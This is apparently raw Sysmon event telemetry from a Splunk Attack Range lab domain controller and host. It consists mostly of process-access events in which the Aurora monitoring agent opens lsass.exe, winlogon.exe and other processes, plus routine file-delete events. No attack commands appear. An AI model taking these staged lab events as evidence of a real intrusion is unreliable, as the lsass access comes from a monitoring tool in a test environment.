10341000x800000000000000045405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.736{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.734{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000017831Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:52.445{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94D75CB62534AEAF69CB9AA5C9936D9F,SHA256=9C48629DDB328CD6774CAF4CB5740CD7B9F6AE42671C34DC896C84C980342884,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:52.206{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000045427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:52.028{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26B5C14CD1298F8FD32A979C2CB09575,SHA256=C7E0AB2F97F0F53AEBB5DF5708035B9A4D0C9767EAD8DB85199E4E0E3C54927B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017830Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:50.099{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50152-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017832Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:53.521{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F06F4D6384F559BEC375CC5626D87FCF,SHA256=DB9A2ECA90EB35ECA04DD28A58BBA899E4BFA2994B8DEDA5F0EEC97C6095FD5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:53.816{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-047MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:53.111{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B2797DAFC88ABAB62AFD42B1AD0E970,SHA256=F93F030A71A384476434B20F5BEC2B07E89700684258B4CAB488FF649265A685,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017833Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:54.585{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18F8118BEBAFDBABF56DF5AE6E30A418,SHA256=4F37564427285123717150ECDC3F5AE18A5286E66B336239A9A28180EB46B504,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.852{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=60E6B7DCC3C233170455009CFF336694,SHA256=6138410A66B8F2405090E9495E41FB5F4958614764E69DA28340604931B175DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000045460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.844{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=DBA0133AD7C403006B17169078784C74,SHA256=9F385B9BB279AD5BCFC34A248ED383A519F39AE8124575480815A2A5DD35C547,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.835{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000045453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.815{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-048MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.774{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.769{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program 